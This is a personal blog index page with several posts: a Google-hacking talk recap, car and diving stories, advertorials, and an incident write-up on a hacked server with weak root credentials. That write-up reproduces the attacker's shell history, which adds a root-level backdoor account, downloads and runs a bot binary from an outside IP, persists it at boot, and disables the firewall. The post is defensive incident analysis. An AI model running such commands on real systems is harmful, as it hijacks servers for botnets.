Advanced Information Gathering AKA Google Hacking at HITB 2004

So this was the first real talk I gave, I’d just moved to Malaysia not long beforehand and I’d started work at NSS as the lead for the penetration testing team. We were a sponsor of Hack in the Box 2004 so we got a speakers slot, but it couldn’t be a product/company pitch it had to be a proper infosec/technical talk which passed the regular CFP (Call for paper) requirements.

It was decided that I give the talk..I was very nervous as you can imagine, even back then it was rather a large conference, and this was my first real shot at talking. Looking back at the slides 10 years later though, I think I did a pretty good – much of the information is still relevant today.

And when I gave the talk the room was packed, people were standing and listening. I think because it was actually one of the less technical talks, more people could enjoy it – it went down really well. The subject was something I did at work, and often the first stage in a penetration test – information gathering. Arguably it’s also the most important phase as it gives you all the entry points and people to target in later phases. The hot keywords at that time were Google Hacking and the GHDB (Google Hacks Database).

Information Gathering AKA Google Hacking

It was about 6 years after this that I gave me next talk, not sure why – perhaps just lack of opportunity. I also did an interview with The Star afterwards titled Guarding against Google hacking, where I met Chris Chong.

Google Hacking - The Star

The talk covers the lesser known aspects of Google, tools such as Athena and Sitedigger and the amount of random misconfiguration that can be found with a little careful search engine manipulation. Other useful public databases will be covered with some details on how to leverage the maximum amount of detail on any given target.

Also an introduction to the Google API and how it can be used or abused during a penetration test or hack attempt. This presentation will include a live demonstration in which the above techniques will used to gather coveted information about both random and targeted organizations.

So here are the slides:

And the video (yah we had recordings back then, shared via Torrent!):

Enjoy!

You can see all my talks given here.

Tags: , , , , , , , , , ,

Continue Reading · No Comments · Hacking & Infosec

An Anatomy Of A Hack – Weak ROOT Password

So a peaceful Sunday night, I get an odd bandwidth warning for a development/testing server that a developer recently created. It was doing some fairly immense traffic, peaking at 80mb a second and averaging about 8mb/s – definitely not normal.

Image 2014-08-31 at 8.42.18 PM

I tried to access the server via SSH but couldn’t connect at all, port 22 was connection reset by peer (which indicates a block or drop) and our normal port wasn’t responding at all.

I accessed the server via the Linode LISH console, but it wasn’t accepting any of our secure passwords, so I shut it down and used the Linode manager to reset the root password. This then allowed me to boot it up and access it via LISH with the root user.

What I discovered next was the reason why I couldn’t SSH in either on port 22 the default port, or our regular SSH port (which is not 22). I could see from these lines in the .bash_history for root that SSH had been blocked for everyone except 2 IP addresses.

    9  echo "sshd:121.12.168.62"  >> /etc/hosts.allow
   10  echo "sshd:37.48.73.19"  >> /etc/hosts.allow
   11  echo "sshd:ALL"  >> /etc/hosts.deny

Which would prevent any SSH access at all.

So they logged in, created a user called restart, blocked everyone but 2 IP addresses from accessing via SSH, then downloaded a piece of malware (or what I assume to be a botnet client) from the first IP address http://121.12.168.62:6789/com

Then they ran this, and added it to /etc/rc.local to make sure it runs on restart. Here’s the full history:

    1  w
    2  uname -a
    3  ethtool eth0
    4  ifconfiog
    5  ifconfig
    6  last
    7  useradd -g 0 -u 0 -o restart
    8  echo restart:restart |chpasswd
    9  echo "sshd:121.12.168.62"  >> /etc/hosts.allow
   10  echo "sshd:37.48.73.19"  >> /etc/hosts.allow
   11  echo "sshd:ALL"  >> /etc/hosts.deny
   12  cd /tmp/scp
   13  ls
   14  chmod 777 *
   15  ./x 5.153
   16  ls
   17  chmod 777 *
   18  ./x 5.153
   19  cd /etc
   20  wget http://121.12.168.62:6789/com
   21  chmod 0755 com
   22  ./com &
   23  chattr +i com
   24  echo "cd  /root/">>/etc/rc.local
   25  echo "./com&">>/etc/rc.local
   26  echo "/etc/init.d/iptables stop">>/etc/rc.local

I uploaded the malware to VirusTotal to scan it and see what it turned up:

VirusTotal Scan

The only decent description I found was from Telus:

Backdoor.Linux.Ganiw.A is a Backdoor and Bot agent that targets the Linux platform. The malware contacts a remote server, identifying itself, and sending system information. In addition, it receives control commands to perform various nefarious activities on the infected system. Moreover, the malware has the capabilities to embark on different types of DoS attacks. To survive a system reboot, it adds an entry to the initialization directory “/etc/init.d”.

As for the actual entry, it seems like the password was popped by a different IP address (Also from China), and then later on the same day, it was logged into by our main IP address 121.12.168.62.

Aug 30 01:46:43 li737-216 sshd[20132]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=60.172.228.102  user=root
Aug 30 01:46:45 li737-216 sshd[20134]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=60.172.228.102  user=root
Aug 30 01:46:47 li737-216 sshd[20134]: Failed password for root from 60.172.228.102 port 4670 ssh2
Aug 30 01:46:58 li737-216 sshd[20134]: message repeated 5 times: [ Failed password for root from 60.172.228.102 port 4670 ssh2]
Aug 30 01:46:58 li737-216 sshd[20134]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=60.172.228.102  user=root
Aug 30 01:47:00 li737-216 sshd[20136]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=60.172.228.102  user=root
Aug 30 01:47:01 li737-216 sshd[20136]: Failed password for root from 60.172.228.102 port 4526 ssh2
Aug 30 01:47:12 li737-216 sshd[20136]: message repeated 5 times: [ Failed password for root from 60.172.228.102 port 4526 ssh2]
Aug 30 01:47:12 li737-216 sshd[20136]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=60.172.228.102  user=root
Aug 30 01:47:14 li737-216 sshd[20138]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=60.172.228.102  user=root
Aug 30 01:47:15 li737-216 sshd[20138]: Failed password for root from 60.172.228.102 port 3781 ssh2
Aug 30 01:47:25 li737-216 sshd[20138]: message repeated 5 times: [ Failed password for root from 60.172.228.102 port 3781 ssh2]
Aug 30 01:47:25 li737-216 sshd[20138]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=60.172.228.102  user=root
Aug 30 01:47:27 li737-216 sshd[20140]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=60.172.228.102  user=root
Aug 30 01:47:29 li737-216 sshd[20140]: Failed password for root from 60.172.228.102 port 4405 ssh2
Aug 30 01:47:39 li737-216 sshd[20140]: message repeated 5 times: [ Failed password for root from 60.172.228.102 port 4405 ssh2]
Aug 30 01:47:39 li737-216 sshd[20140]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=60.172.228.102  user=root
Aug 30 01:47:41 li737-216 sshd[20144]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=60.172.228.102  user=root
Aug 30 01:47:44 li737-216 sshd[20144]: Failed password for root from 60.172.228.102 port 1662 ssh2
Aug 30 01:47:54 li737-216 sshd[20144]: message repeated 5 times: [ Failed password for root from 60.172.228.102 port 1662 ssh2]
Aug 30 01:47:54 li737-216 sshd[20144]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=60.172.228.102  user=root
Aug 30 01:47:55 li737-216 sshd[20146]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=60.172.228.102  user=root
Aug 30 01:47:57 li737-216 sshd[20146]: Failed password for root from 60.172.228.102 port 4220 ssh2
Aug 30 01:47:57 li737-216 sshd[20146]: Accepted password for root from 60.172.228.102 port 4220 ssh2

Then the login:

Aug 30 01:47:57 li737-216 sshd[20146]: Accepted password for root from 60.172.228.102 port 4220 ssh2
Aug 30 10:17:56 li737-216 sshd[21293]: Accepted password for root from 121.12.168.62 port 3117 ssh2

As a rule I disable root login via SSH, move it to a different port (not 22), disable password based logins, and use a limited list of users that can access SSH. This makes it pretty secure and can be done with the following SSH settings:

Port 888
PermitRootLogin no
PasswordAuthentication no
AllowUsers YOURALLOWEDUSER

Then restart SSHd of course. Generally choose a port below 1024, as then it’s still a privileged port and can’t be hijacked by a non-root user (for the paranoid).

This server was only 11 days old, fortunately it has nothing important on it and doesn’t have access to anything else. Just be warned, even if you are disabling root login later, put a secure password in from the start..as you might forget about the server for a while.

And then it’ll get owned by some Chinese hacker and turned into part of their botnet for hire.

There’s really not ever any excuse to have a weak root password.

Tags: , , , , , , , , ,

Continue Reading · 2 Comments · Hacking & Infosec

Oldskool Car Porn: The 1990 Lotus Carlton

I can never forget this car, seriously. My uncle drove a lot for work, I never knew exactly what he did, but he was the first person I knew that owned a laptop. He worked in some kind of manufacturing industry and was possibly a rep/salesman.

Which suits this car, well the original version anyway – the rather boring Vauxhall Carlton (along with the Ford Sierra) was a stock 90s salesman car.

1986 Vauxhall Carlton

Certainly not the most exciting car on the block. Until 1990 anyway.

I remember my uncle was looking for a new car and I happened to join him as he’d found a Lotus Carlton he’d like to look at, he didn’t know much about the car, and well nor did I. There wasn’t a whole lot of Internet back then, and there certainly wasn’t the abundance of information on sites like Wikipedia. It just so happened the car he wanted to look at was near where I lived, so he was coming down from Birmingham to have a look. I’d guess this was probably around 1992-1994 period, so the car was likely new, or barely used (1-2 years old).

When I saw it, I was like..is that it? I was pretty underwhelmed to be honest. For a £48,000 car (which was an enormous amount of money back then).

Lotus Carlton

Even the interior was kind of drab, dull and plasticy. It just had the odd Lotus emblem here and there.

Lotus Carlton Interior

Little did I realise this was a 377bhp, 3.6L twin turbo BEAST which could reach 100mph (160km/h) in less than 17 seconds. So we sat it in, took it for a test drive. It seemed fairly ordinary as we tootled around, then we reached the sliproad to the motorway.

We weren’t going slow, my uncle was in third gear as he reached the merge and he accelerated hard to pull onto the motorway at a decent speed (as you would)..the car span its wheels like a drag bike on a leash.

And once it found grip…it pressed my head so hard into the back of the seat I thought my eyeballs were going to collapse. It was quite an eye watering ride.

And yah, at that point I realised this car was really something special. I read whatever I could about it and was amazed to find that it could outperform the top supercars of that era like the Ferrari Testarossa which could do 0-60mp/h in only 5.3 seconds and had a top speed of 180mph (only 3 mph more than the Carlton!).

For a 4 door sedan..full of people, speeding along like a bullet train. Quite a crazy (and scary) proposition). Also the fact that it was a target for car thieves and criminals as the police didn’t have any cars fast enough to chase it made it a little unpractical.

Sadly my uncle didn’t buy the car, so I didn’t get to sit in it (or any other) ever again. There was only 320 Lotus Carlton’s released in the UK, so it is a rare car. Even now, 20+ years later they are fetching good money for mint condition examples (£12-20,000).

There is a modern day equivalent or a spiritual successor (in some ways), the Vauxhall VXR8.

But yah, something I still remember so vividly from my younger years. Some videos for reference..

Fifth Gear Vauxhall VXR8 vs Lotus Carlton

Top Gear Lotus Carlton

Autocar heroes: Lotus Carlton video review

Tags: , , , , , , , , ,

Continue Reading · No Comments · Cars/Motorsport

An Introduction To Information Security – OpenCoffeeClubKL #31

So I gave a talk about infosec stuff in July at OpenCoffeeClub KL, as it’s what I used to do for a living – people were always asking me to share a little more about it.

The timing is a little odd again, as it happens. In 2011 I did 2 talks in the same month, 1 on WordPress (High Performance WordPress – Scaling, Tuning, Optimizing & More) & one which was more random (The History Of The Future at WebCamp KL).

In 2012 I ended up doing 2 presentations in the same week (actually on 2 consecutive days), and once again the first was technical and the second a bit more random.

The first one was about MongoDB and was for the KL Mongo User Group AKA KL MUGHigh Availability MongoDB & Replica Sets – A How To & Kinda Tutorial.

The second was to a bunch of copywriters about blogging – Blogging WTF? At The Last Word KL – A Meeting For Copywriters.

I guess I skipped on 2013, and here I am in 2014 – giving 2 talks almost in the same month again, the first being this one actually and the second was Building Scalable Web Apps – LVL.UP KL – July 2014

My talk was about 15 minutes and titled “Introduction to Information Security” – which covers some basics on what Information Security is, how it can impact your business and some tips on how to mitigate against risk.

An Introduction To Information Security

Here are the slides:

And the video (the front got cut off slightly – but nothing important, only when I was talking about myself):

So yah, an introduction to infosec – if you do have any further questions drop them in the comments below!

You can see all my talks given here.

Tags: , , , , , , , , , , ,

Continue Reading · No Comments · Hacking & Infosec

My 6 Tips For Fuel Effeciency & Shell FuelSave Challenge 2014

Fuel economy is super important and is one of the reasons I recently changed to a new car as old cars tend to get less and less efficient as they get more age.

Fuel Efficiency

There are various things you can to increase your fuel economy which fall into 4 main categories:

  • Drive more efficiently (Drive smoothly, remove roofracks when not in use, change to higher gears faster etc)
  • Keep your car well maintained (Use the correct oil and follow the service schedule, inflate your tyres appropriately etc)
  • Plan and combined trips (Try and avoid traffic jams, combine trips where you can, don’t idle too much)
  • Choose a more efficient vehicle (Choose a Diesel car, or a hybrid or one of the newer more efficient models)

Shell is super passionate about helping Malaysian motorists to be more fuel efficient by making smart choices on the road and also with Shell FuelSave 95, which has Active Efficiency Ingredients designed to improve fuel and engine efficiency.

This year, if you take part in the Shell FuelSave Challenge 2014 you will be able to enhance your knowledge on making smart choices on the road through a new experience beyond the driving challenge by being part of an exciting online Shell FuelSave Journey with the opportunity to win exclusive prizes and rewards

Which brings us to the 6th annual Shell FuelSave Challenge, which showcases how easy it is for you to save fuel and become advocates for fuel efficiency coupled with using Shell FuelSave 95 which is optimized for greater fuel efficiency. It will be a great platform to learn more about fuel efficiency and educate yourself a little on things you can do, and choices you can make to increase your fuel economy.

Shell FuelSave Challenge 2014

To be a part of this year’s Shell FuelSave Challenge, you must be aged between 21 years and 60 years, with a minimum of two (2) years of driving experience. If you fulfil these criteria you can make your way to the Shell FuelSave Roadshows which will be held in four cities across the nation (Johor Bahru, Kuantan, Penang & KL) to answer a few simple questions and go through a short listing process.

Alternatively, you can register online for the Shell FuelSave Challenge and take part in the Shell FuelSave Journey here www.shell.com.my/fschallenge.

The grand prize is well worth a look as the four winners from each city will compete for RM20,000!. And well even if you don’t win anything, you’ll learn a lot more about making smart choices whilst driving with Shell FuelSave Tips and about Shell FuelSave 95.

Do you have any tips to share for saving fuel? Here are some of my personal tips:

  1. Don’t accelerate aggressively
  2. In traffic keep a good distance and look a few cars ahead to see what’s happening, this avoids excessive braking/acceleration
  3. If you have a turbo car, get a boost gauge and keep the vacuum pressure low (below 0.5bar) to save fuel
  4. Check your tyre pressures regularly and keep them inflated properly
  5. Use cruise control if you have it on the highway (this keeps your speed constant and improves fuel efficiency a lot)
  6. Don’t drive too fast

Remember to sign up here – www.shell.com.my/fschallenge.

Tags: , , , , , , ,

Continue Reading · No Comments · Advertorial

Building Scalable Web Apps – LVL.UP KL – July 2014

So the most recent LVL.UP KL meeting was about Internet Architecture (my speciality! yay) – and we had an amazing line-up of speakers – plus me.

Building Scalable Web Apps

It wasn’t my most coherent talk, due to my wife just giving birth (7 weeks early..) – so I was pretty tired and did the slides at 5am – not that should be an excuse haha. My talk was about Building Scalable Web Apps which covered a basic intro to scalability, 5 things to consider/think about and 5 things you can do to build at scale.

Anyway here are the slides:

I’m just sad my animated GIFs didn’t work in the live preso or on Slideshare – bah!

And the video of the talk:

If you have any comments/suggestions/feedback please do drop them in the comments below.

Enjoy!

You can see all my talks given here.

Tags: , , , , , , , , ,

Continue Reading · No Comments · Sys Admin & DevOps

Selamat Hari Raya For 2014

Selamat Hari Raya 2014 everyone, have a great holiday with your friends and families, drive safe and eat plenty!

Salam Aidilfitri

Forgive those who’ve wronged you, and apologise to those you’ve wronged.

And watch my video of course :)

Enjoy the break!

Tags: , , , ,

Continue Reading · 2 Comments · General Nonsense

SCUBA Diving At Pom Pom Island, Sabah – Malaysia

So in the first part of this trip I wrote about getting to Pom Pom, our experience there, the food, the resort and so on. But obviously we went there for diving! So how was SCUBA diving at Pom Pom island?

I didn’t have the best start, gearing up for the first dive..my BCD back plate snapped – boo! Shortly after this picture I think.

Gearing Up

But even the shore dive on the first day was great, just look at that scenery and crystal clear water.

Pom Pom Island Beach

One of my issues with diving is that…I’m so white like a milk bottle, whenever someone takes a picture of me underwater with a flash – it gets mad overexposed..haha. Like so:

Shiny White Head

Anyway as for diving, we had a great time, visibility was pretty good on the whole, currents not to strong and some interesting spots (You’ll see so many turtles you’ll get kinda bored of it haha). The only thing that kind of freaked us out was the bombing, the sea gypsies use dynamic/grenades/c4 to bomb large areas of the coral and catch all the fish.

This leads to massive devastation of the coral ecosystem, and a loud bang under the water when you are diving (if you are near enough you can feel a slight movement in the water as the force wave passes by).

The place was absolutely stunning of course, whichever way you looked it was just amazing and the water was super flat like a millpond most of the time. Really relaxing.

SCUBA Diving

There was a good variety of things if you are into photography too (macro and micro), like this cute Juvenile Spiny Puffer.

Juvenile Spiny Puffer

And this fearsome Moray Eel.

Moray Eel

And best of all this rather prehistoric looking Crocodile Fish.

Crocodile Fish

Here’s Kim and I enjoying to the max, we had a really good time and great dives at Pom Pom – can’t wait to go back!

Kim & Gareth

These were our dive-sites:

Day 2:

#1 Drop Coral – Manta Buan
#2 Aquarium – Manta Buan
#3 Mandarin Playground – Pom Pom

Day 3:
Bohey Dulang
#1 Two Brothers – Beautiful coral landscape, drift dive. Orang utan crab. Turtle. Cuttlefish.
#2 Two Sisters – Juvenile box fish. Saw the results of fishing with dynamite :(
#3 Shore night dive – cuttlefish, nudi, lots of eels (zebra eel)

Day 4:
Mataking
#1 Shipwreck post – garden eel, lion fish, angler fish, trigger fish, Moray eel, huge old turtle, juvenile box fish
#2 House Reef – amazing under the jetty was like the world’s best aquarium. Saw the massive resident barracuda called charlie. Scorpion fish, garden eels. Unicorn fish.
#3 Pom Pom Lobster Wall – nudi, scorpion fish, turtle, amazing wall drop

Shipwreck post is actually a pretty interesting dive as there’s an official (POS Malaysia sanctioned) underwater post box where you can send your postcards out, really cool! Unfortunately there were a LOT of particles in the water and it was pretty dark so the pictures didn’t come out great, but it was a really fun experience.

Mataking underwater postbox

Another memorable dive was the Mataking House Reef, which is basically a dive under and around the resort jetty, there is a lone Barracuda that’s always there, IIRC his name was Charley. He kept his beady eyes on us, but was pretty cool.

Barracuda - Charley

The obligatory underwater group shot (which you might have seen printed out at this years MIDE).

Pom Pom Group Shot

I honestly can’t wait to go back, and am just itching to go diving in general. Arghhh!

Underwater pics thanks to Marcus & JK.

Tags: , , , , , , , , ,

Continue Reading · 5 Comments · Malaysia, SCUBA Diving, Trips & Travel

Please Service Your Car Before You Balik Kampung! Carama by Castrol

I really love cars, I have a whole category for Cars/Motorsport and a hashtag for my Mitsubishi Airtrek Turbo – which I pride myself on taking extremely good care of.

It’s important to maintain your car well for multiple reasons, the main and MOST important one being safety. Safety for you, your passengers and family and for everyone else on the road that could be affected by your poorly maintained car.

Secondly, if you follow your service intervals properly, replace parts when they are supposed to be replaced and just generally take care of your car – it will last a lot longer and you’ll save a lot on larger, more serious repairs down the road.

And lastly, well if you do balik kampung, you want to get home on time! Plus if you break down, you are going to contribute to the already epic traffic jams getting worse – no one wants that do they?

Plus the fact it’s really hard to find a good, honest, trustworthy car workshop in Malaysia that does quality work for a fair price. That’s why we do really needs sites like Carama to help us make informed decisions as consumers, but to be useful, more people need to use such services and leave reviews (both good and bad).

Thankfully for you Carama provides you with an avenue to find a good workshop near you AND they are having a Balik Kampung promotion at the moment, which will get you a service worth RM200 for only RM128. The savings by themselves are already great, but Carama gives you the benefit of being able to book online and see ratings/reviews for workshops by people who have used them.

The service includes:

  • 1. Semi synthetic oil change (up to four litres)
  • 2. New Oil filter
  • 3. Brake inspection:
    • Disc pads inspection
    • Brake line
    • Calipers & rotors
    • Brake shoes
    • Drums
    • Air cleaning
    • Brake fluid top up (if necessary)
  • 4. Car Safety and Health Inspection
    • Battery water top up
    • Radiator water top up
    • Brake fluid top up
    • Power steering fluid top up
    • Windscreen washer tank top up
    • Air filter check & clean
    • Spark plugs check
    • Windscreen wiper check
    • Drive belts check
    • Cooling hoses & connections check
    • Check & adjust tyres pressure
    • Headlamp, tail light, brakes and signal lights conditions check
    • Radiator leakage check
    • Tyres condition check
    • Battery terminal and cable check

Carama Safe Balik Kampung Promotion

A lot of the traffic jams and accidents during the festive season are due to cars that are driven mainly in the city suddenly going on a long trip without proper maintenance, bald tyres, worn down brake pads and so on.

Don’t let it happen to you! I might be travelling around a bit during the festive season so I headed over to Carama to see if there’s any good workshops near me available to give my car a once over. I was glad to see there was a workshop pretty near to where I live with good ratings (4/5 from 5 reviews).

Carama

The interface for Carama is really straight forward and it’s easy to make your booking.

Carama by Castrol

The site also provides a “Service Price Calculator” which can help you calculate approximately how much certain things should cost, to protect you from getting fleeced.

All you need do is make a booking at one of the 200+ workshops in the Klang valley and use the promo code “RAYA 128“. The promo package is available for bookings made from 1st July to 31st July 2014 and must be made online.

You can check out the site to learn more and make your booking here.

Tags: , , , , , , , ,

Continue Reading · No Comments · Advertorial

England In The World Cup 2014

So… How was England in The World Cup 2014 – pretty much the same as they always have been – completely shite. Someone mentioned it must be nice to have your own home country to support in the World Cup rather than being a Malaysian you have to pick a team by random.

I said it probably would be, if your team didn’t just lose all the time..

I mean back in 2010 I was already getting depressed when England got hammered 4-1 by Germany (BLOODY GERMANY OF ALL TEAMS). And this time? This time we couldn’t beat anyone, not even Costa Rica?

Here’s my summary post of the 2010 World Cup after the final – And That’s It..The FIFA World Cup 2010 In South Africa Is OVER.

And yah we went crashing out, losing our first two games and not even looking vaguely organized and dangerous, we just have no World class finishing power. Rooney scored his first World Cup Finals goal EVER, and it was the easiest goal of the World Cup..

So yah a whole bunch of this basically sums up this World Cup for England.

England World Cup 2014

It was a fun World Cup, and well so far this one is shaping up to be fun too, it’s been a really high scoring World Cup so far and some surprise teams like Chile and Costa Rica doing really well.

I have to say Iran performed fabulously too (well beyond expectations).

I didn’t write much about the 2006 World Cup apart from the dirty bastard diving Italians cheating the Soceroos.

Anyway the World Cup is over for England, if Italy had won we’d still stand a minuscule chance, but seen as though they didn’t..we are totally out.

Netherlands are looking pretty hot this year, and Germany are playing a much more fluid open game. Spain going out as the ruling champs was a shocker of course..I’d probably put the top 4 as Brazil (home team advantage counts for a lot too), Argentina (always dangerous..and Messi – how do you stop him?), Germany (good young team with some great finishers like Muller and old man Kloser at the moment) with France & Holland on the outside.

Tags: , , , , ,

Continue Reading · 3 Comments · General Nonsense